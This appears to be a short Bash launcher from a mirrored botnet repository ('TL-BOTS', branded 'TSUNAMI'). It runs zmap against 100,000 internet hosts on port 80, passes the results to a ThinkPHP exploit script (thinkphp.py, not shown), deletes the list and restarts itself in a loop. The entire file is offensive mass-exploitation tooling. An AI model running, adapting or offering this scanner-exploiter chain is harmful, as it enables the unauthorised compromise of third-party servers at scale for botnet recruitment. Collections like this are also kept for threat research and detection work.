6
0
mirror of https://github.com/threatland/TL-BOTS synced 2024-06-20 22:09:50 +00:00
TL-BOTS/TL.EXPLOIT_SCAN/EXPLOIT.ThinkPHP/thinkphp.ddcf3d.sh
2019-10-02 16:41:26 -04:00

10 lines
218 B
Bash

#!/bin/bash
clear
echo -e "\e[1;97m[\e[1;36mTSUNAMI\e[1;97m] \e[1;36mNow Auto-Scanning ThinkPHP"
zmap -p80 -o list.txt -B100M -N 100000
ulimit -n 999999
python thinkphp.py list.txt
rm -rf list.txt
clear
sh thinkphp.sh